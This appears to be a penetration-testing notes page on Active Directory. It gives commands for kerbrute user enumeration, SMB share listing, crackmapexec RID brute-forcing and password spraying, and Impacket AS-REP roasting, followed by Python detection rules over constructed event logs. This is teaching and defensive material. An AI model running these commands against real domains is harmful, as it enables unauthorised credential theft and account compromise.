Active Directory
Last updated 3 years ago
Enumeration

Recon first using any port scanning tool.

Kerberos & Smb

Try to gather as much info as possible. I usually start by brute-forcing usernames. If we already know some creds, go straight to listing shares:

#no user, no creds: enumerate valid usernames against the DC via Kerberos
kerbrute userenum --dc DC.machine-A.local -d machine-A.local userlist.txt

#with creds (smbclient takes the password as user%pass; -p is the port, not the password)
smbclient -L \\\\<ip> -U 'user%pass' #list shares
smbclient \\\\10.10.188.12\\Share -U 'user%pass' #specific share

smbmap -u user -p pass -R <share> -H <IP> -P <port> #recursive listing, works better for enum sometimes

smbclient \\\\<ip>\\JuicyShare -U user@domain.local #interactive, prompts for the password

Then I check whether any account is active with smbmap, smbclient, or crackmapexec. With crackmapexec we can also brute-force the RIDs:

#if guest account is available, no pass, rid bruteforcing
crackmapexec smb DC.machine-A.local -u 'guest' -p '' --rid-brute

You can then put every SidTypeUser entry into a list and test those accounts for disabled Kerberos pre-authentication (AS-REP roasting), hopefully dumping some hashes:

#no creds: try each user from the list; accounts without pre-auth return a crackable AS-REP hash
python impacket/GetNPUsers.py <domain-name>/ -usersfile user.txt -no-pass -dc-ip <dc-ip>
#with creds: query the domain for accounts that have pre-authentication disabled
python3 impacket/GetNPUsers.py "domain.local/User:Pass"

If any other users come out, great: you can now try brute-forcing a login, provided there is no lockout policy or other anti-brute-force mechanism in place. You can also do this with crackmapexec:

crackmapexec smb DC.machine-A.local -u 'DnsAdmins' -p passwordlist #one user, many passwords: mind the lockout threshold
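Every step above leaves a distinct footprint in the domain controller's Security log, which is what a blue team uses to spot it. The following is an added example written for this page (not part of the original notes or of any tool mentioned here) that runs three detection rules over constructed Windows Security event records: kerbrute-style username enumeration (many 4768 failures with status 0x6, unknown principal, from one source), AS-REP roast candidates (successful 4768 with pre-authentication type 0 and RC4 ticket encryption, which is what GetNPUsers.py triggers), and a password spray (4771 status 0x18, wrong password, across many distinct accounts from one source). The sample events, field names and IP addresses are assumptions modelled on the Windows event schema, not captured logs.

```python
"""Detection rules for the Kerberos/SMB enumeration steps described above,
run over constructed Windows Security event records (hypothetical sample data)."""
from collections import defaultdict
import json

# Constructed sample events modelled on Windows Security log fields
# (EventID 4768 = Kerberos TGT requested, 4771 = Kerberos pre-auth failed).
# These are made-up records, not captured logs.
SAMPLE_EVENTS = [
    # kerbrute-style user enumeration: many unknown principals from one source
    *[{"EventID": 4768, "TargetUserName": f"user{i}", "IpAddress": "10.10.14.5",
       "Status": "0x6", "PreAuthType": "-", "TicketEncryptionType": "0xffffffff"}
      for i in range(12)],
    # successful TGT request with pre-auth disabled and RC4: AS-REP roast candidate
    {"EventID": 4768, "TargetUserName": "svc_backup", "IpAddress": "10.10.14.5",
     "Status": "0x0", "PreAuthType": "0", "TicketEncryptionType": "0x17"},
    # a normal TGT request (pre-auth type 2, AES256 ticket) that must not alert
    {"EventID": 4768, "TargetUserName": "alice", "IpAddress": "10.10.20.7",
     "Status": "0x0", "PreAuthType": "2", "TicketEncryptionType": "0x12"},
    # password spray: one source, many accounts, wrong password (0x18)
    *[{"EventID": 4771, "TargetUserName": n, "IpAddress": "10.10.14.5", "Status": "0x18"}
      for n in ("alice", "bob", "carol", "dave", "erin", "frank")],
    # a single user mistyping their own password is not a spray
    {"EventID": 4771, "TargetUserName": "bob", "IpAddress": "10.10.20.7", "Status": "0x18"},
]


def detect_user_enumeration(events, threshold=10):
    """Rule 1: one source IP producing 4768 failures with status 0x6
    (KDC_ERR_C_PRINCIPAL_UNKNOWN) for many distinct names looks like kerbrute userenum.
    Returns {source_ip: [attempted names]} for sources at or above the threshold."""
    unknown = defaultdict(set)
    for e in events:
        if e["EventID"] == 4768 and e["Status"].lower() == "0x6":
            unknown[e["IpAddress"]].add(e["TargetUserName"])
    return {ip: sorted(names) for ip, names in unknown.items() if len(names) >= threshold}


def detect_asrep_roast_candidates(events):
    """Rule 2: a successful 4768 with PreAuthType 0 (no pre-authentication) and an
    RC4 (0x17) ticket is the trace a GetNPUsers.py request leaves on the DC.
    Returns the sorted account names that should have pre-auth re-enabled."""
    return sorted({e["TargetUserName"] for e in events
                   if e["EventID"] == 4768
                   and e["Status"].lower() == "0x0"
                   and e["PreAuthType"] == "0"
                   and e["TicketEncryptionType"].lower() == "0x17"})


def detect_password_spray(events, threshold=5):
    """Rule 3: 4771 with status 0x18 (wrong password) across many distinct accounts
    from one source is a spray; one user retrying their own password is not.
    Returns {source_ip: [targeted accounts]} for sources at or above the threshold."""
    failed = defaultdict(set)
    for e in events:
        if e["EventID"] == 4771 and e["Status"].lower() == "0x18":
            failed[e["IpAddress"]].add(e["TargetUserName"])
    return {ip: sorted(names) for ip, names in failed.items() if len(names) >= threshold}


def run_all(events=SAMPLE_EVENTS):
    """Run every rule and return the findings keyed by rule name."""
    return {
        "user_enumeration": detect_user_enumeration(events),
        "asrep_roast_candidates": detect_asrep_roast_candidates(events),
        "password_spray": detect_password_spray(events),
    }


if __name__ == "__main__":
    print(json.dumps(run_all(), indent=2))
```

The thresholds are deliberately per-source rather than per-account: lockout policies count failures per account, which is exactly why spraying (one password, many accounts) slips past them, so the detection has to pivot on the source instead. On a real DC the same rules apply to events exported from the Security channel; the only change is feeding the parsed records in place of `SAMPLE_EVENTS`.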

(Screenshot: snippet of other users found)